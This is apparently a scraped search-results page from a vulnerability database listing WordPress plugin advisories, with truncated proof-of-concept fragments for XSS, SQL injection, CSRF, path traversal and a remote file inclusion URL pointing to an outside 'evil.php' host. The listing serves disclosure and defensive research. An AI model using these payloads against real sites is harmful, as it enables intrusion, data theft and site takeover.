Lucene search
K
WpexploitMost viewed

4359 matches found

wpexploit
wpexploit
•added 2022/03/09 12:0 a.m.•78 views

WP HTML Mail < 3.1.3 - Reflected Cross-Site Scripting

The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting https://example.com/wp-admin/options-general.php?page=wp-html-mail&tab=advanced&a"alert/XSS/...

7.1AI score
Exploits0
wpexploit
wpexploit
•added 2022/02/22 12:0 a.m.•78 views

RW Divi Unite Gallery <= 1.0 - Security Bypass via Outdated Freemius

The plugin is vulnerable to a security bypass due to the use of a known vulnerable component, Freemius 2.2.4. The plugin uses Freemius 1.0.0 and is therefore vulnerable. The core issue that causes the vulnerability is in the setdboption function, which is exposed to any authenticated user with no...

0.7AI score
Exploits0References1
wpexploit
wpexploit
•added 2022/02/15 12:0 a.m.•78 views

Relevanssi - Subscriber+ Unauthorised AJAX Calls

The plugins do not have authorisation and CSRF checks in some of their AJAX actions, allowing any authenticated users, such as subscriber, to call them. This could disclose information to subscribers, as well as allow them to truncate the index, which will disable the search...

2.5AI score
Exploits0References2
wpexploit
wpexploit
•added 2022/02/03 12:0 a.m.•78 views

Ad Inserter < 2.7.11 - Admin+ RCE / Stored XSS

The plugin does not make any security checks regarding the PHP and JS code in blocks, allowing high privilege users such as admin to execute commands on the underlying OS as well as perform Stored Cross-Site Scripting attacks even in multisite blogs and hardened ones. 1. Go to Settings - Ad...

0.7AI score
Exploits0
wpexploit
wpexploit
•added 2022/01/24 12:0 a.m.•78 views

Catch Web Tools < 2.7.1 - Subscriber+ Arbitrary Catch IDs Activation/Deactivation

The plugin does not have authorisation and CSRF check in its catchwebtoolscatchidsswitch AJAX action, allowing any authenticated users, such as subscriber to activate/disable Catch IDs fetch"https://example.com/wp-admin/admin-ajax.php", "headers": "content-type":...

0.9AI score
Exploits0References1
wpexploit
wpexploit
•added 2021/12/27 12:0 a.m.•78 views

WP Extra File Types < 0.5.1 - CSRF to Stored Cross-Site Scripting

The plugin does not have CSRF check when saving its settings, nor sanitise and escape some of them, which could allow attackers to make a logged in admin change them and perform Cross-Site Scripting attacks var form1 = document.getElementById'hack'; form1.submit;...

8CVSS0.2AI score0.00541EPSS
Exploits2
wpexploit
wpexploit
•added 2021/11/29 12:0 a.m.•78 views

Rich Reviews by Starfish < 1.9.6 - Admin+ SQL Injection

The plugin does not properly validate the orderby GET parameter of the pending reviews page before using it in a SQL statement, leading to an authenticated SQL injection issue error-based SQLI: orderby=id AND EXTRACTVALUE4795,CONCAT0x5c,0x717a627871,SELECT ELT4795=4795,1,0x7176707071 time-based...

7.2CVSS1.6AI score0.01497EPSS
Exploits2References1
wpexploit
wpexploit
•added 2023/03/16 12:0 a.m.•77 views

WP Tiles <= 1.1.2 - Contributor+ Stored XSS

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks wp-tiles extraclasses='"...

5.4CVSS5.2AI score0.00471EPSS
Exploits2
wpexploit
wpexploit
•added 2023/01/17 12:0 a.m.•77 views

uTubeVideo Gallery < 2.0.8 - Contributor+ Stored XSS

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. utubevideo view='panel' id='"...

5.4CVSS1.4AI score0.00477EPSS
Exploits2
wpexploit
wpexploit
•added 2023/01/05 12:0 a.m.•77 views

Widgets for Google Reviews < 9.8 - Contributor+ Stored XSS

The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins. Exploit...

6.4CVSS1.6AI score0.00507EPSS
Exploits2
wpexploit
wpexploit
•added 2022/01/31 12:0 a.m.•77 views

Superforms < 6.0.4 - Reflected Cross-Site Scripting

The plugin does not escape the bobczypanstwasprawazostalarozwiazana parameter before outputting it back in an attribute via the superlanguageswitcher AJAX action, leading to a Reflected Cross-Site Scripting. The action is also lacking CSRF, making the attack easier to perform against any user...

0.8AI score0.00313EPSS
Exploits2References1
wpexploit
wpexploit
•added 2020/12/12 12:0 a.m.•77 views

Directories Pro < 1.3.46 - Authenticated Self-Reflected Cross-Site Scripting

The plugin did not sanitise the column names when importing a malicious CSV file, allowing for HTML or JavaScript injection. Iimport a CSV file containing the following in the header: 'term" autofocus onfocus=alert'Complex\u0020XSS';alertdocument.cookie;//'"...

4.3CVSS6.5AI score0.05483EPSS
Exploits3References1
wpexploit
wpexploit
•added 2022/12/05 12:0 a.m.•76 views

Welcart e-Commerce < 2.8.5 - Subscriber+ Arbitrary File Access

The plugin does not validate user input before using it to output the content of a file via an AJAX action available to any authenticated users, which could allow users with a role as low as subscriber to read arbitrary files on the server. Run the below command in the developer console of the we...

6.5CVSS0.00795EPSS
Exploits2
wpexploit
wpexploit
•added 2022/03/29 12:0 a.m.•76 views

English WordPress Admin < 1.5.2 - Unauthenticated Open Redirect

The plugin does not validate the admincustomlanguagereturnurl before redirecting users o it, leading to an open redirect issue https://example.com/wp-admin/admin-ajax.php?action=heartbeat&admincustomlanguagetoggle=1&admincustomlanguagereturnurl=https://wpscan.com...

6.1CVSS2.4AI score0.01873EPSS
Exploits2
wpexploit
wpexploit
•added 2022/03/28 12:0 a.m.•76 views

Thank Me Later <= 3.3.4 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape the Message Subject field before outputting it in the Messages list, which could allow high privileges users such as admin to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed Add/Edit a message and put the following...

4.8CVSS0.5AI score0.00577EPSS
Exploits2
wpexploit
wpexploit
•added 2022/01/17 12:0 a.m.•76 views

WP-Appbox < 4.3.18 - Authenticated Local File Inclusion

The plugin does not validate user input before using it to create a local path then passed to an includeonce statement, leading to a Local File Inclusion issue https://example.com/wp-admin/options-general.php?page=wp-appbox&tab=advanced%2F..%2F...

1.2AI score
Exploits0
wpexploit
wpexploit
•added 2022/01/12 12:0 a.m.•76 views

Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue < 3.1.31 - Reflected Cross-Site Scripting

The plugin does not escape the lang and pid parameter before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues https://example.com/wp-admin/admin.php?sibpageform&action=edit&id=1&pid=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22...

6.1CVSS1.1AI score0.00788EPSS
Exploits2
wpexploit
wpexploit
•added 2021/05/07 12:0 a.m.•76 views

Leads-5050 Visitor Insights < 1.1.0 - Unauthorised License Change

The leads5050setlicense AJAX action is available to authenticated users, but is missing any capability and CSRF checks. This could allow any low privilege users subscriber+ to set an arbitrary license in the plugins settings POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Accept: application/jso...

1.5AI score
Exploits0
wpexploit
wpexploit
•added 2020/07/13 12:0 a.m.•76 views

Workup – Job Board < 2.1.6 - Unauthenticated Reflected XSS

Unauthenticated Reflected XSS vulnerability was discovered in the «Workup – Job Board WordPress Theme», tested version — v2.1.5...

1.8AI score
Exploits0References2
wpexploit
wpexploit
•added 2019/02/15 12:0 a.m.•76 views

Advanced Custom Fields <= 5.7.10 - Unserialize of user input

Multiple maybeunserialize calls result with unserialize of user input. Low priviledged users as contributors, but in many cases visitors too https://medium.com/websec/wordpress-acf-5-7-10-unserialize-of-user-input-ac17cc473e0d...

3.4AI score
Exploits0References1
wpexploit
wpexploit
•added 2018/10/02 12:0 a.m.•76 views

Wordfence <= 7.1.12 - Username Enumeration Prevention Bypass

The Wordfence Security – Firewall & Malware Scan WordPress plugin was affected by an Username Enumeration Prevention Bypass security vulnerability. Wordfence blocks: http://www.example.com/?author=1 But allowed: http://www.example.com/?author=1...

0.9AI score
Exploits0References2
wpexploit
wpexploit
•added 2020/12/09 12:0 a.m.•75 views

DiveBook <= 1.1.4 - Unauthenticated SQL Injection

The filterdiver GET parameter, in pages where the DiveBook is embed, does not properly sanitise and validate user data, leading to an Unauthenticated SQL injection vulnerability. The PoC will be displayed once the issue has been remediated...

5CVSS1AI score0.01422EPSS
Exploits1References1
wpexploit
wpexploit
•added 2023/01/30 12:0 a.m.•74 views

GS Books Showcase < 1.3.1 - Contributor+ Stored XSS

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. gsbookshowcase theme='" onmouseover="alert1...

6.8CVSS5.2AI score0.00608EPSS
Exploits2
wpexploit
wpexploit
•added 2022/04/04 12:0 a.m.•74 views

Weblizar Pin It Button On Image Hover And Post < 3.4 - Subscriber+ Arbitrary Settings Update

The plugin does not have authorisation and proper CSRF check when saving its settings, allowing any authenticated users, such as subscribers to update them fetch"https://example.com/wp-admin/admin-ajax.php", "headers": "content-type": "application/x-www-form-urlencoded", , "body": new...

0.6AI score
Exploits0
wpexploit
wpexploit
•added 2022/01/17 12:0 a.m.•74 views

Magee Shortcodes < 2.0.9 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape various parameters before outputting them back in attributes in AJAX actions available to both unauthenticated and authenticated users, leading to Reflected Cross-Site Scripting issues...

6.6AI score
Exploits0
wpexploit
wpexploit
•added 2022/01/05 12:0 a.m.•74 views

SupportCandy < 2.2.7 - CSRF to Cross-Site Scripting

The plugin does not have CSRF check in the wpsctickets AJAX action, nor has any sanitisation or escaping in some of the filter fields which could allow attackers to make a logged in user having access to the ticket lists dashboard set an arbitrary filter stored in their cookies with an XSS payloa...

8.8CVSS0.7AI score0.00612EPSS
Exploits2
wpexploit
wpexploit
•added 2021/12/14 12:0 a.m.•74 views

True Ranker < 2.2.4 - Unauthenticated Arbitrary File Access via Path Traversal

The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the /admin/vendor/datatables/examples/resources/examples.php file. Exploit Authors: Nicole Sheinin, Liad Levy Tested on: MacOS !/usr/bin/env python3 impo...

7.5CVSS0.8AI score0.78431EPSS
Exploits5References2
wpexploit
wpexploit
•added 2020/04/06 12:0 a.m.•74 views

Vanguard <= 2.1 - Multiple Cross-Site Scripting (XSS)

The plugin does not sanitise, validate or escape some of its parameters before outputting the back in various place, leading to either Stored or Reflected Cross-Site Scripting issues Put the following payload in the In Products Search box: " POST /search HTTP/1.1 Accept:...

4.3CVSS0.5AI score0.01167EPSS
Exploits2References1
wpexploit
wpexploit
•added 2019/07/17 12:0 a.m.•74 views

WP Code Highlight.js < 0.6.3 - CSRF to Stored XSS

Lack of CSRF checks could allow attackers to make a logged in admin create XSS payloads. document.getElementById'hljs'.submit;...

6.8CVSS0.8AI score0.01343EPSS
Exploits2References1
wpexploit
wpexploit
•added 2023/02/08 12:0 a.m.•73 views

Replyable < 2.2.10 - Subscriber+ PHP Object Injection

The plugin does not validate the class name submitted by the request when instantiating an object in the promptdismissnotice action and also lacks CSRF check in the related action. This could allow any authenticated users, such as subscriber to perform Object Injection attacks. The attack could...

8.8CVSS8.7AI score0.00511EPSS
Exploits2
wpexploit
wpexploit
•added 2022/12/23 12:0 a.m.•73 views

Show All Comments < 7.0.1 - Reflected XSS

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin. Visit the following URL authenticated or not to trigger an alert box:...

6.1CVSS0.2AI score0.00897EPSS
Exploits2
wpexploit
wpexploit
•added 2021/11/10 12:0 a.m.•73 views

Error Log Viewer Plugin <= 1.1.1 - Admin+ Arbitrary File Clearing

The plugin does not validate the path of the log file to clear, allowing high privilege users to clear arbitrary files on the web server, including those outside of the blog folder Click the "Log Monitor" available under Error Log Viewer menu item. Choose a log file to clear. Intercept the reques...

0.9AI score0.05188EPSS
Exploits5
wpexploit
wpexploit
•added 2020/04/20 12:0 a.m.•73 views

GTranslate < 2.8.52 - Unauthenticated Reflected Cross Site Scripting (XSS)

The GTranslate plugin before 2.8.52 for WordPress was vulnerable to an Unauthenticated Reflected XSS vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option. The vulnerability was due to outputting the WordPress addqueryarg...

4.3CVSS0.1AI score0.04457EPSS
Exploits1References1
wpexploit
wpexploit
•added 2019/09/05 12:0 a.m.•73 views

WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation

Description According to the WordPress release notes: "Props to Soroush Dalili @irsdl from NCC Group for disclosing an issue with URL sanitization that can lead to cross-site scripting XSS attacks." Thanks to @irsdl's Hacker1 disclosure: JS - Numerical Entities JS - Hex Entities...

6.1CVSS6.3AI score0.02198EPSS
Exploits2References3
wpexploit
wpexploit
•added 2023/01/30 12:0 a.m.•72 views

GS Portfolio for Envato < 1.4.0 - Contributor+ Stored XSS

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks Insert the following shortcode in a...

5.4CVSS5.2AI score0.00457EPSS
Exploits2
wpexploit
wpexploit
•added 2022/01/31 12:0 a.m.•72 views

Crazy Bone <= 0.6.0 - Unauthenticated Stored XSS

The plugin does not sanitise and escape the username submitted via the login from when displaying them back in the log dashboard, leading to an unauthenticated Stored Cross-Site scripting curl 'https://example.com/wp-login.php' --data-raw 'log=a&pwd=x&wp-submit=Log+In' The XSS will be trigged in...

0.6AI score0.01374EPSS
Exploits2
wpexploit
wpexploit
•added 2022/01/06 12:0 a.m.•72 views

IP2Location Country Blocker < 2.26.5 - Subscriber+ Arbitrary Country Ban

The plugin does not have authorisation and CSRF checks in the ip2locationcountryblockersaverules AJAX action, allowing any authenticated users, such as subscriber to call it and block arbitrary country, or block all of them at once, preventing users from accessing the frontend. v2.26.5 added...

7.1CVSS0.6AI score0.00537EPSS
Exploits2References1
wpexploit
wpexploit
•added 2021/12/09 12:0 a.m.•72 views

Accept Donations with PayPal < 1.3.4 - Arbitrary Post Deletion via CSRF

The plugin does not have CSRF check in place and does not ensure that the post to be deleted belongs to the plugin, allowing attackers to make a logged in admin delete arbitrary posts from the blog https://examle.com/wp-admin/admin.php?page=wpedonmenu&action=delete&action2=delete&order=1...

6.5CVSS2.9AI score0.00538EPSS
Exploits2
wpexploit
wpexploit
•added 2021/11/29 12:0 a.m.•72 views

Download Manager < 3.2.22 - Subscriber+ Stored Cross-Site Scripting

The plugin does not sanitise and escape Template data before outputting it in various pages such as admin dashboard and frontend. Due to the lack of authorisation and CSRF checks in the wpdmsavetemplate AJAX action, any authenticated users such as subscriber is able to call it and perform...

5.4CVSS0.6AI score0.006EPSS
Exploits2
wpexploit
wpexploit
•added 2022/03/14 12:0 a.m.•71 views

Members List < 4.3.7 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape some parameters in various pages before outputting them back, leading to Reflected Cross-Site Scripting issues https://example.com/wp-content/plugins/members-list/admin/view/user.php?page=%22%3E%3Cimg/src/onerror=alert/XSS/%20x...

1.2AI score
Exploits0References1
wpexploit
wpexploit
•added 2021/10/21 12:0 a.m.•71 views

Core Tweaks WP Setup <= 4.1 - Arbitrary Admin Account Creation / Admin Email Update via CSRF

The plugin allows to bulk-set many settings in WordPress, including the admin email, as well as creating a new admin account. There is no CSRF protection in place, allowing an attacker to arbitrary change the admin email or create another admin account and takeover the website via CSRF attacks...

1.4AI score0.00618EPSS
Exploits2
wpexploit
wpexploit
•added 2023/02/02 12:0 a.m.•69 views

Magazine Edge <= 1.13 - Subscriber+ Arbitrary Plugin Activation

The theme does not have authorisation and CSRF when activating plugins via an AJAX action, allowing any authenticated users, such as subscriber to activate arbitrary plugins Run the below command in the developer console of the web browser while being on the blog as a subscriber user...

1AI score
Exploits0
wpexploit
wpexploit
•added 2023/01/30 12:0 a.m.•69 views

GS Filterable Portfolio < 1.6.1 - Contributor+ Stored XSS

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. Note: First, you need to add a Portfolio...

5.4CVSS5.2AI score0.00457EPSS
Exploits2
wpexploit
wpexploit
•added 2021/12/06 12:0 a.m.•69 views

WPcalc <= 2.1 - Authenticated SQL Injection

The plugin does not sanitize user input into the 'did' parameter and uses it in a SQL statement, leading to an authenticated SQL Injection vulnerability. Plugin author closed the plugin. http://www.example.com/wp-admin/admin.php?page=wpcalc&info=del&did=1 AND SELECT 7156 FROM SELECTSLEEP5MIkl or,...

8.8CVSS1.3AI score0.01318EPSS
Exploits2
wpexploit
wpexploit
•added 2021/11/29 12:0 a.m.•69 views

Contact Form & Lead Form Elementor Builder < 1.6.4 - Unauthenticated Stored Cross-Site Scripting

The plugin does not sanitise and escape some lead values, which could allow unauthenticated users to perform Cross-Site Scripting attacks against logged in admin viewing the inserted Leads fetch"https://example.com/wp-admin/admin-ajax.php", "headers": "content-type":...

6.1CVSS0.3AI score0.01167EPSS
Exploits2
wpexploit
wpexploit
•added 2020/05/11 12:0 a.m.•68 views

Page Builder by SiteOrigin < 2.10.16 - CSRF to Reflected Cross-Site Scripting (XSS)

Flaws in the live editor and actionbuildercontent functions of the plugin "allow attackers to forge requests on behalf of a site administrator and execute malicious code in the administrator’s browser. The attacker needs to trick a site administrator into executing an action, like clicking a link...

6.8CVSS0.4AI score0.00809EPSS
Exploits3References1
wpexploit
wpexploit
•added 2020/04/02 12:0 a.m.•68 views

Art-Picture-Gallery <= 1.2.9 - Unauthenticated Arbitrary File Upload

Edit WPScanTeam: March 26th, 2020 - Report Received & Vendor Contacted March 30th, 2020 - Escalated to WP Plugins team as no response from vendor March 31st, 2020 - WP Plugins team investigating & Plugin closed April 2nd, 2020 - Disclosure The PoC will be displayed once the issue has been remedia...

7.5CVSS0.6AI score0.97107EPSS
Exploits15
wpexploit
wpexploit
•added 2020/01/17 12:0 a.m.•68 views

Marketo Forms and Tracking <= 1.0.2 - CSRF to XSS

Lack of CSRF checks and sanitisation on the plugin's settings page could allow XSS attacks via CSRF. document.getElementById'csrf'.submit;...

6.8CVSS1AI score0.0132EPSS
Exploits2References1
wpexploit
wpexploit
•added 2022/02/15 12:0 a.m.•67 views

The Events Calendar < 5.14.0 - Reflected Cross-Site Scripting

The plugin does not escape an aggregator URL before outputting it back in an attribute, leading to Reflected Cross-Site Scripting When there is an Event Aggregator license key active: https://example.com/wp-admin/edit.php?page=tribe-common&tab=imports&posttype=tribeevents&"alert/XSS/...

7.1AI score
Exploits0
wpexploit
wpexploit
•added 2021/12/05 12:0 a.m.•67 views

Button Generator < 2.3.3 - RFI leading to RCE via CSRF

The plugin within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE. http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...

8.8CVSS1.2AI score0.0353EPSS
Exploits2References1
Total number of security vulnerabilities4359